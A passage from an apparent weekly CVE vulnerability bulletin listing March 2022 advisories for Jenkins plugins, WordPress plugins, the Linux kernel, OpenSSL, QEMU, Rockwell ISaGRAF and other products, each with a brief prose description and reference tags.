CONFIRM
MLIST
jenkins — extended_choice
Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers with Item/Configure permission to read values from arbitrary JSON and Java properties files on the Jenkins controller. 2022-03-15 not yet calculated CVE-2022-27203
CONFIRM
MLIST
jenkins — extended_choice
Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier does not escape the value and description of extended choice parameters of radio buttons or check boxes type, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. 2022-03-15 not yet calculated CVE-2022-27202
CONFIRM
MLIST
jenkins — extended_choice
 
A cross-site request forgery vulnerability in Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers to connect to an attacker-specified URL. 2022-03-15 not yet calculated CVE-2022-27204
CONFIRM
MLIST
jenkins — extended_choice
 
A missing permission check in Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL. 2022-03-15 not yet calculated CVE-2022-27205
CONFIRM
MLIST
jenkins — favorite
 
Jenkins Favorite Plugin 2.4.0 and earlier does not escape the names of jobs in the favorite column, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure or Item/Create permissions. 2022-03-15 not yet calculated CVE-2022-27196
CONFIRM
MLIST
jenkins — folder-based_authorization_strategy
 
Jenkins Folder-based Authorization Strategy Plugin 1.3 and earlier does not escape the names of roles shown on the configuration form, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission. 2022-03-15 not yet calculated CVE-2022-27200
CONFIRM
MLIST
jenkins — git_branches_parameter
 
Jenkins List Git Branches Parameter Plugin 0.0.9 and earlier does not escape the name of the ‘List Git branches (and more)’ parameter, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. 2022-03-15 not yet calculated CVE-2022-27212
CONFIRM
MLIST
jenkins — gitlab_authentication
 
Jenkins GitLab Authentication Plugin 1.13 and earlier stores the GitLab client secret unencrypted in the global config.xml file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27206
CONFIRM
MLIST
jenkins — global-build-stats
 
Jenkins global-build-stats Plugin 1.5 and earlier does not escape multiple fields in the chart configuration on the ‘Global Build Stats’ page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission. 2022-03-15 not yet calculated CVE-2022-27207
CONFIRM
MLIST
jenkins — incapptic_connect_uploader
 
Jenkins incapptic connect uploader Plugin 1.15 and earlier stores tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27218
CONFIRM
MLIST
jenkins — kubernetes_continuous_deploy
Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows users with Credentials/Create permission to read arbitrary files on the Jenkins controller. 2022-03-15 not yet calculated CVE-2022-27208
CONFIRM
MLIST
jenkins — kubernetes_continuous_deploy
 
A missing or incorrect permission check in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 2022-03-15 not yet calculated CVE-2022-27211
CONFIRM
MLIST
jenkins — kubernetes_continuous_deploy
 
A cross-site request forgery (CSRF) vulnerability in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 2022-03-15 not yet calculated CVE-2022-27210
CONFIRM
MLIST
jenkins — kubernetes_continuous_deploy
 
A missing permission check in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. 2022-03-15 not yet calculated CVE-2022-27209
CONFIRM
MLIST
jenkins — parameterized_trigger
 
Jenkins Parameterized Trigger Plugin 2.43 and earlier captures environment variables passed to builds triggered using Jenkins Parameterized Trigger Plugin, including password parameter values, in their `build.xml` files. These values are stored unencrypted and can be viewed by users with access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27195
CONFIRM
MLIST
jenkins — release_helper
 
A cross-site request forgery (CSRF) vulnerability in Jenkins Release Helper Plugin 1.3.3 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials. 2022-03-15 not yet calculated CVE-2022-27214
CONFIRM
MLIST
jenkins — release_helper
 
A missing permission check in Jenkins Release Helper Plugin 1.3.3 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials. 2022-03-15 not yet calculated CVE-2022-27215
CONFIRM
MLIST
jenkins — semantic_versioning
 
Jenkins Semantic Versioning Plugin 1.13 and earlier does not restrict execution of a controller/agent message to agents, and implements no limitations about the file path that can be parsed, allowing attackers able to control agent processes to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery. 2022-03-15 not yet calculated CVE-2022-27201
CONFIRM
MLIST
jenkins — vmware_vrealize_codestream
 
Jenkins Vmware vRealize CodeStream Plugin 1.2 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27217
CONFIRM
MLIST
kingsoft — internet_security_9_plus
 
The kernel mode driver kwatch3 of KINGSOFT Internet Security 9 Plus Version 2010.06.23.247 fails to properly handle crafted inputs, leading to stack-based buffer overflow. 2022-03-17 not yet calculated CVE-2022-25949
JVN
CONFIRM
kunze_law — kunze_law
 
The Kunze Law WordPress plugin before 2.1 does not escape its ‘E-Mail Error “From” Address’ settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0674
MISC
libnested — libnested
 
The package libnested before 1.5.2 is vulnerable to Prototype Pollution via the set function in index.js. **Note:** This vulnerability derives from an incomplete fix for [CVE-2020-28283](https://security.snyk.io/vuln/SNYK-JS-LIBNESTED-1054930) 2022-03-17 not yet calculated CVE-2022-25352
MISC
MISC
MISC
libvcs — libvcs
 
The package libvcs before 0.11.1 is vulnerable to Command Injection via argument injection. When calling the update_repo function (when using hg), the url parameter is passed to the hg clone command. By injecting some hg options it was possible to get arbitrary command execution. 2022-03-14 not yet calculated CVE-2022-21187
MISC
MISC
MISC
ligeo_archives — ligeo_basics
 
Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. 2022-03-17 not yet calculated CVE-2021-46107
MISC
MISC
linux — linux_kernel
 
In the Linux kernel before 5.15.3, fs/quota/quota_tree.c does not validate the block number in the quota tree (on disk). This can, for example, lead to a kernel/locking/rwsem.c use-after-free if there is a corrupted quota file. 2022-03-18 not yet calculated CVE-2021-45868
MISC
MISC
MISC
MISC
MISC
linux — linux_kernel
 
Memory leak in icmp6 implementation in Linux Kernel 5.13+ allows a remote attacker to DoS a host by making it go out-of-memory via icmp6 packets of type 130 or 131. We recommend upgrading past commit 2d3916f3189172d5c69d33065c3c21119fe539fc. 2022-03-18 not yet calculated CVE-2022-0742
MISC
MISC
linux — linux_kernel
 
A use-after-free flaw was found in the Linux kernel FUSE filesystem in the way a user triggers write(). A local user could use this flaw to get unauthorized access to some data from the FUSE filesystem and, as a result, potentially escalate privileges. 2022-03-18 not yet calculated CVE-2022-1011
MISC
FEDORA
FEDORA
linux — linux_kernel
 
In drivers/usb/gadget/udc/udc-xilinx.c in the Linux kernel before 5.16.12, the endpoint index is not validated and might be manipulated by the host for out-of-array access. 2022-03-16 not yet calculated CVE-2022-27223
MISC
MISC
login_with_phone_number — login_with_phone_number
 
The Login with phone number WordPress plugin before 1.3.7 includes a file delete.php with no form of authentication or authorization checks placed in the plugin directory, allowing unauthenticated users to remotely delete the plugin files, leading to a potential Denial of Service situation. 2022-03-14 not yet calculated CVE-2022-0593
MISC
MISC
maccms — maccms
 
There is a stored Cross Site Scripting (XSS) vulnerability in maccms v10 through adding videos. XSS code can be inserted at parameter positions including name and remarks. 2022-03-16 not yet calculated CVE-2021-45787
MISC
maccms — maccms
 
In maccms v10, an attacker can log in through /index.php/user/login in the “col” and “openid” parameters to gain privileges. 2022-03-16 not yet calculated CVE-2021-45786
MISC
master_addons_for_elementor — master_addons_for_elementor
 
The Master Addons for Elementor WordPress plugin before 1.8.5 does not sanitise and escape the error_message parameter before outputting it back in the response of the jltma_restrict_content AJAX action, available to unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting 2022-03-14 not yet calculated CVE-2022-0327
MISC
mattermost — mattermost
 
One of the APIs in Mattermost version 6.3.0 and earlier fails to properly protect the permissions, which allows system administrators to combine two distinct privileges/capabilities in a way that allows them to override certain restricted configurations like EnableUploads. 2022-03-18 not yet calculated CVE-2022-1003
MISC
mattermost — mattermost
 
Mattermost 6.3.0 and earlier fails to properly sanitize the HTML content in the email invitation sent to guest users, which allows registered users with special permissions to invite guest users to inject unescaped HTML content in the email invitations. 2022-03-18 not yet calculated CVE-2022-1002
MISC
MISC
maxgalleria — maxgalleria
 
Authenticated (author or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in MaxGalleria WordPress plugin (versions 6.2.5). 2022-03-18 not yet calculated CVE-2022-25603
CONFIRM
CONFIRM
meks_easy_photo_feed_widget — meks_easy_photo_feed_widget
 
The Meks Easy Photo Feed Widget WordPress plugin before 1.2.4 does not have capability and CSRF checks in the meks_save_business_selected_account AJAX action, available to any authenticated user, and does not escape some of the settings. As a result, any authenticated user, such as a subscriber, could update the plugin’s settings and put Cross-Site Scripting payloads in them 2022-03-14 not yet calculated CVE-2021-24958
MISC
microweber — microweber
 
The microweber application allows large characters to be inserted in the input field “post title”, which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request, in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-15 not yet calculated CVE-2022-0961
CONFIRM
MISC
microweber — microweber
 
Unrestricted XML Files Leads to Stored XSS in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-15 not yet calculated CVE-2022-0963
CONFIRM
MISC
microweber — microweber
 
The microweber application allows large characters to be inserted in the input field “first & last name”, which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request, in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-15 not yet calculated CVE-2022-0968
CONFIRM
MISC
microweber — microweber
 
Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop’s Other Settings, Shop’s Autorespond E-mail Settings and Shops’ Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. 2022-03-15 not yet calculated CVE-2022-0954
MISC
CONFIRM
mikrotik — products
 
In the SCEP Server of RouterOS in certain Mikrotik products, an attacker can trigger a heap-based buffer overflow that leads to remote code execution. The attacker must control the SCEP server for a valid certificate. This affects mikrotik-vm-6.46, mikrotik-vm-6.46.8, mikrotik-tile-6.46.8, mikrotik-6.47.9, and mikrotik-6.47.10. 2022-03-16 not yet calculated CVE-2021-41987
MISC
MISC
mimecast — email_security
 
Mimecast Email Security before 2020-01-10 allows any admin to spoof any domain, and pass DMARC alignment via SPF. This occurs through misuse of the address rewrite feature. (The domain being spoofed must be a customer in the Mimecast grid from which the spoofing occurs.) 2022-03-16 not yet calculated CVE-2020-36519
MISC
minimist — minimist
 
Minimist <=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95). 2022-03-17 not yet calculated CVE-2021-44906
MISC
MISC
MISC
MISC
MISC
misp — misp
An issue was discovered in MISP before 2.4.156. app/Model/Server.php does not restrict generateServerSettings to the CLI. This could lead to SSRF. 2022-03-18 not yet calculated CVE-2022-27245
MISC
misp — misp
An issue was discovered in MISP before 2.4.156. A malicious site administrator could store an XSS payload in the custom auth name. This would be executed each time the administrator modifies a user. 2022-03-18 not yet calculated CVE-2022-27244
MISC
misp — misp
An issue was discovered in MISP before 2.4.156. app/View/Users/terms.ctp allows Local File Inclusion via the custom terms file setting. 2022-03-18 not yet calculated CVE-2022-27243
MISC
misp — misp
 
An issue was discovered in MISP before 2.4.156. An SVG org logo (which may contain JavaScript) is not forbidden by default. 2022-03-18 not yet calculated CVE-2022-27246
MISC
multisite_content_copier/updater — multisite_content_copier/updater
 
The WordPress Multisite Content Copier/Updater WordPress plugin before 2.1.2 does not sanitise and escape the s parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue in the network dashboard 2022-03-14 not yet calculated CVE-2022-0503
MISC
netgear — netgear
A vulnerability is in the ‘BRS_top.html’ page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes firmware version information for the device. 2022-03-17 not yet calculated CVE-2021-44261
MISC
MISC
netgear — netgear
 
A vulnerability is in the ‘MNU_top.htm’ page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information for the device. 2022-03-17 not yet calculated CVE-2021-44262
MISC
MISC
netgear — routers
 
A stack overflow vulnerability exists in the upnpd service in Netgear EX6100v1 201.0.2.28, CAX80 2.1.2.6, and DC112A 1.0.0.62, which may lead to the execution of arbitrary code without authentication. 2022-03-18 not yet calculated CVE-2022-24655
MISC
MISC
MISC
nicotine+ — nicotine+
 
Denial of service (DoS) vulnerability in Nicotine+ 3.0.3 and later allows a user with a modified Soulseek client to crash Nicotine+ by sending a file download request with a file path containing a null character. 2022-03-15 not yet calculated CVE-2021-45848
MISC
node-lmdb — node-lmdb
 
The package node-lmdb before 0.9.7 is vulnerable to Denial of Service (DoS) when defining a non-invokable ToString value, which will cause a crash during type check. 2022-03-16 not yet calculated CVE-2022-21164
MISC
MISC
node-ipc — node-ipc
 
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code that targets users with an IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package, which includes potentially undesired behavior. 2022-03-16 not yet calculated CVE-2022-23812
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
nvidia — flare
 
NVIDIA FLARE contains a vulnerability in the admin interface, where an unauthorized attacker can cause Allocation of Resources Without Limits or Throttling, which may lead to the system becoming unavailable. 2022-03-17 not yet calculated CVE-2022-21822
MISC
online_admission_system — online_admission_system
 
The Online Admission System 1.0 allows an unauthenticated attacker to upload or transfer files of dangerous types to the application through documents.php, which may be used to execute malicious code or lead to code execution. 2022-03-18 not yet calculated CVE-2021-45835
MISC
MISC
MISC
online_banking_system — online_banking_system
 
Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via staff_login.php. 2022-03-15 not yet calculated CVE-2022-25494
MISC
online_project_time_management_system — online_project_time_management_system
Online Project Time Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the function save_employee at /ptms/classes/Users.php. 2022-03-16 not yet calculated CVE-2022-26293
MISC
MISC
online_project_time_management_system — online_project_time_management_system
 
A stored cross-site scripting (XSS) vulnerability in /ptms/?page=user of Online Project Time Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user name field. 2022-03-16 not yet calculated CVE-2022-26295
MISC
open_web_analytics — open_web_analytics
 
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with ‘<?php (instead of the intended “<?php sequence) aren’t handled by the PHP interpreter. 2022-03-18 not yet calculated CVE-2022-24637
MISC
CONFIRM
opendocman — opendocman
 
An attacker can upload or transfer files of dangerous types to the OpenDocMan 1.4.4 portal via add.php using MIME-bypass, which may be automatically processed within the product’s environment or lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2021-45834
MISC
MISC
MISC
MISC
openexr — multipart_input_file
 
A flaw was found in OpenEXR’s Multipart input file functionality. A crafted multi-part input file with no actual parts can trigger a NULL pointer dereference. The highest threat from this vulnerability is to system availability. 2022-03-16 not yet calculated CVE-2021-20299
MISC
MISC
MISC
openssl — openssl
 
The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include:
– TLS clients consuming server certificates
– TLS servers consuming client certificates
– Hosting providers taking certificates or private keys from customers
– Certificate authorities parsing certification requests from subscribers
– Anything else which parses ASN.1 elliptic curve parameters
Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). 2022-03-15 not yet calculated CVE-2022-0778
CONFIRM
CONFIRM
CONFIRM
CONFIRM
DEBIAN
MLIST
MLIST
opensuse — factory
 
An Improper Privilege Management vulnerability in the sudoers configuration in cscreen of openSUSE Factory allows any local user to gain the privileges of the tty and dialout groups and access and manipulate any running cscreen session. This issue affects: openSUSE Factory cscreen version 1.2-1.3 and prior versions. 2022-03-16 not yet calculated CVE-2022-21946
CONFIRM
opensuse — factory
 
An Insecure Temporary File vulnerability in cscreen of openSUSE Factory allows local attackers to cause DoS for cscreen and a system DoS for non-default systems. This issue affects: openSUSE Factory cscreen version 1.2-1.3 and prior versions. 2022-03-16 not yet calculated CVE-2022-21945
CONFIRM
openvpn — openvpn
 
OpenVPN 2.1 until v2.4.12 and v2.5.6 may enable authentication bypass in external authentication plug-ins when more than one of them makes use of deferred authentication replies, which allows an external user to be granted access with only partially correct credentials. 2022-03-18 not yet calculated CVE-2022-0547
MISC
MISC
MISC
paramiko — paramiko
 
In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure. 2022-03-17 not yet calculated CVE-2022-24302
MISC
MISC
pascom — cloud_phone_system
An issue was discovered in Pascom Cloud Phone System before 7.20.x. A configuration error between NGINX and a backend Tomcat server leads to a path traversal in the Tomcat server, exposing unintended endpoints. 2022-03-18 not yet calculated CVE-2021-45967
MISC
MISC
MISC
MISC
pascom — cloud_phone_system
An issue was discovered in xmppserver jar in the XMPP Server component of the Jive platform, as used in Pascom Cloud Phone System before 7.20.x (and in other products). An endpoint in the backend Tomcat server of Pascom allows SSRF, a related issue to CVE-2019-18394. 2022-03-18 not yet calculated CVE-2021-45968
MISC
MISC
MISC
MISC
MISC
pascom — cloud_phone_system
 
An issue was discovered in Pascom Cloud Phone System before 7.20.x. In the management REST API, /services/apply in exd.pl allows remote attackers to execute arbitrary code via shell metacharacters. 2022-03-18 not yet calculated CVE-2021-45966
MISC
MISC
MISC
petfinder_listings — petfinder_listings
 
The Petfinder Listings WordPress plugin through 1.0.18 does not escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0702
MISC
pgadmin_4 — pgadmin_4
 
When run in server mode, pgAdmin 4 allows users to store files on the server under individual storage directories. Files such as SQL scripts may be uploaded through the user interface. The URI to which upload requests are made fails to validate the upload path to prevent path traversal techniques being used to store files outside of the storage directory. A malicious, but authorised and authenticated user can construct an HTTP request using their existing CSRF token and session cookie to manually upload files to any location that the operating system user account under which pgAdmin is running has permission to write. 2022-03-16 not yet calculated CVE-2022-0959
MISC
php — php
 
A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows an unauthenticated remote attacker to upload a maliciously crafted PHP via photo upload. 2022-03-17 not yet calculated CVE-2021-44087
MISC
MISC
MISC
pimcore — pimcore Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-15 not yet calculated CVE-2022-0894
CONFIRM
MISC
pimcore — pimcore Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-16 not yet calculated CVE-2022-0911
CONFIRM
MISC
pimcore — pimcore
 
Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-16 not yet calculated CVE-2022-0704
CONFIRM
MISC
pimcore — pimcore
 
Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-16 not yet calculated CVE-2022-0705
CONFIRM
MISC
pimcore — pimcore
 
Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-15 not yet calculated CVE-2022-0893
CONFIRM
MISC
piwigo — piwigo
 
Piwigo v12.2.0 was discovered to contain a SQL injection vulnerability via pwg.users.php. 2022-03-18 not yet calculated CVE-2022-26266
MISC
piwigo — piwigo
 
Piwigo v12.2.0 was discovered to contain an information leak via the action parameter in /admin/maintenance_actions.php. 2022-03-18 not yet calculated CVE-2022-26267
MISC
post-loader — post-loader
 
The package post-loader from 0.0.0 are vulnerable to Arbitrary Code Execution which uses a markdown parser in an unsafe way so that any javascript code inside the markdown input files gets evaluated and executed. 2022-03-17 not yet calculated CVE-2022-0748
MISC
price_table — price_table
 
Authenticated (contributor of higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in WordPress Price Table plugin (versions <= 0.2.2). 2022-03-18 not yet calculated CVE-2022-25604
CONFIRM
CONFIRM
projectworlds — hospital_management_system
 
An issue was discovered in Projectworlds Hospital Management System v1.0. Unauthorized malicious attackers can add patients without restriction via add_patient.php. 2022-03-16 not yet calculated CVE-2021-45852
MISC
prototype_pollution — prototype_pollution
 
The package set-in before 2.0.3 are vulnerable to Prototype Pollution via the setIn method, as it allows an attacker to merge object prototypes into it. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-28273](https://security.snyk.io/vuln/SNYK-JS-SETIN-1048049) 2022-03-17 not yet calculated CVE-2022-25354
MISC
MISC
MISC
qemu — e1000_nic_emulator
 
An infinite loop flaw was found in the e1000 NIC emulator of the QEMU. This issue occurs while processing transmits (tx) descriptors in process_tx_desc if various descriptor fields are initialized with invalid values. This flaw allows a guest to consume CPU cycles on the host, resulting in a denial of service. The highest threat from this vulnerability is to system availability. 2022-03-16 not yet calculated CVE-2021-20257
MISC
MISC
MISC
MISC
qemu — vhost-vsock_device
 
A flaw was found in the vhost-vsock device of QEMU. In case of error, an invalid element was not detached from the virtqueue before freeing its memory, leading to memory leakage and other unexpected results. Affected QEMU versions <= 6.2.0. 2022-03-16 not yet calculated CVE-2022-26354
MISC
qemu — virtio-net_device
 
A flaw was found in the virtio-net device of QEMU. This flaw was inadvertently introduced with the fix for CVE-2021-3748, which forgot to unmap the cached virtqueue elements on error, leading to memory leakage and other unexpected results. Affected QEMU version: 6.2.0. 2022-03-16 not yet calculated CVE-2022-26353
MISC
qs — qs
 
A Denial of Service vulnerability exists in qs up to 6.8.0 due to insufficient sanitization of property in the gs.parse function. The merge() function allows the assignment of properties on an array in the query. For any property being assigned, a value in the array is converted to an object containing these properties. Essentially, this means that the property whose expected type is Array always has to be checked with Array.isArray() by the user. This may not be obvious to the user and can cause unexpected behavior. 2022-03-17 not yet calculated CVE-2021-44907
MISC
MISC
MISC
MISC
quake — quake
 
The package guake before 3.8.5 are vulnerable to Exposed Dangerous Method or Function due to the exposure of execute_command and execute_command_by_uuid methods via the d-bus interface, which makes it possible for a malicious user to run an arbitrary command via the d-bus method. **Note:** Exploitation requires the user to have installed another malicious program that will be able to send dbus signals or run terminal commands. 2022-03-17 not yet calculated CVE-2021-23556
MISC
MISC
MISC
MISC
MISC
rambus_safezone — basic_crypto_module
 
The Rambus SafeZone Basic Crypto Module before 10.4.0, as used in certain Fujifilm (formerly Fuji Xerox) devices before 2022-03-01, Canon imagePROGRAF and imageRUNNER devices through 2022-03-14, and potentially many other devices, generates RSA keys that can be broken with Fermat’s factorization method. This allows efficient calculation of private RSA keys from the public key of a TLS certificate. 2022-03-14 not yet calculated CVE-2022-26320
MISC
CONFIRM
MISC
MISC
rapid7 — insight_agent
 
Rapid7 Insight Agent versions 3.1.2.38 and earlier suffer from a privilege escalation vulnerability, whereby an attacker can hijack the flow of execution due to an unquoted argument to the runas.exe command used by the ir_agent.exe component, resulting in elevated rights and persistent access to the machine. This issue was fixed in Rapid7 Insight Agent version 3.1.3.80. 2022-03-17 not yet calculated CVE-2022-0237
CONFIRM
MISC
rapid7 — nexpose
 
Rapid7 Nexpose versions 6.6.93 and earlier are susceptible to an SQL Injection vulnerability, whereby valid search operators are not defined. This lack of validation can allow an attacker to manipulate the “ANY” and “OR” operators in the SearchCriteria and inject SQL code. This issue was fixed in Rapid7 Nexpose version 6.6.129. 2022-03-17 not yet calculated CVE-2022-0757
CONFIRM
rapid7 — nexpose
 
Rapid7 Nexpose versions 6.6.129 and earlier suffer from a reflected cross site scripting vulnerability, within the shared scan configuration component of the tool. With this vulnerability an attacker could pass literal values as the test credentials, providing the opportunity for a potential XSS attack. This issue is fixed in Rapid7 Nexpose version 6.6.130. 2022-03-17 not yet calculated CVE-2022-0758
CONFIRM
responsive_menu — responsive_menu
 
Nonce token leak vulnerability leading to arbitrary file upload, theme deletion, plugin settings change discovered in Responsive Menu WordPress plugin (versions <= 4.1.7). 2022-03-18 not yet calculated CVE-2022-25602
CONFIRM
CONFIRM
rockwell_automation — isagraf_runtime Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x includes the functionality of setting a password that is required to execute privileged commands. The password value passed to ISaGRAF Runtime is the result of encryption performed with a fixed key value using the tiny encryption algorithm (TEA) on an entered or saved password. A remote, unauthenticated attacker could pass their own encrypted password to the ISaGRAF 5 Runtime, which may result in information disclosure on the device. 2022-03-18 not yet calculated CVE-2020-25180
CONFIRM
CONFIRM
CONFIRM
CONFIRM
rockwell_automation — isagraf_runtime Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x stores the password in plaintext in a file that is in the same directory as the executable file. ISaGRAF Runtime reads the file and saves the data in a variable without any additional modification. A local, unauthenticated attacker could compromise the user passwords, resulting in information disclosure. 2022-03-18 not yet calculated CVE-2020-25184
CONFIRM
CONFIRM
CONFIRM
CONFIRM
rockwell_automation — isagraf_runtime Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x searches for and loads DLLs as dynamic libraries. Uncontrolled loading of dynamic libraries could allow a local, unauthenticated attacker to execute arbitrary code. This vulnerability only affects ISaGRAF Runtime when running on Microsoft Windows systems. 2022-03-18 not yet calculated CVE-2020-25182
CONFIRM
CONFIRM
CONFIRM
CONFIRM
rockwell_automation — isagraf_runtime ISaGRAF Workbench communicates with Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x using TCP/IP. This communication protocol provides various file system operations, as well as the uploading of applications. Data is transferred over this protocol unencrypted, which could allow a remote unauthenticated attacker to upload, read, and delete files. 2022-03-18 not yet calculated CVE-2020-25178
CONFIRM
CONFIRM
CONFIRM
CONFIRM
rockwell_automation — isagraf_runtime
 
Some commands used by the Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x eXchange Layer (IXL) protocol perform various file operations in the file system. Since the parameter pointing to the file name is not checked for reserved characters, it is possible for a remote, unauthenticated attacker to traverse an application’s directory, which could lead to remote code execution. 2022-03-18 not yet calculated CVE-2020-25176
CONFIRM
CONFIRM
CONFIRM
CONFIRM
runasspc — runasspc
 
RunAsSpc 4.0 uses a universal and recoverable encryption key. In possession of a file encrypted by RunAsSpc, an attacker can recover the credentials that were used. 2022-03-16 not yet calculated CVE-2022-26660
MISC
sailsjs — sail.js
 
SailsJS Sails.js <=1.4.0 is vulnerable to Prototype Pollution via controller/load-action-modules.js, function loadActionModules(). 2022-03-17 not yet calculated CVE-2021-44908
MISC
MISC
MISC
samba — samba Kerberos acceptors need easy access to stable AD identifiers (eg objectSid). Samba as an AD DC now provides a way for Linux applications to obtain a reliable SID (and samAccountName) in issued tickets. 2022-03-16 not yet calculated CVE-2020-25721
MISC
MISC
MISC
secure_mobile_access — 100_series_products
 
** UNSUPPORTED WHEN ASSIGNED ** Improper neutralization of Special Elements leading to OS Command Injection vulnerability impacting end-of-life Secure Remote Access (SRA) products and older firmware versions of Secure Mobile Access (SMA) 100 series products, specifically the SRA appliances running all 8.x, 9.0.0.5-19sv and earlier versions and Secure Mobile Access (SMA) 100 series products running older firmware 9.0.0.9-26sv and earlier versions. 2022-03-17 not yet calculated CVE-2022-22273
CONFIRM
seo_301_meta — seo_301_meta
 
The SEO 301 Meta WordPress plugin through 1.9.1 does not escape its Request and Destination settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0701
MISC
simple_quotation — simple_quotation The Simple Quotation WordPress plugin through 1.3.2 does not have authorisation (and CSRF) checks in various of its AJAX actions and is lacking escaping of user data when using it in SQL statements, allowing any authenticated users, such as subscriber to perform SQL injection attacks 2022-03-14 not yet calculated CVE-2022-22735
MISC
simple_quotation — simple_quotation
 
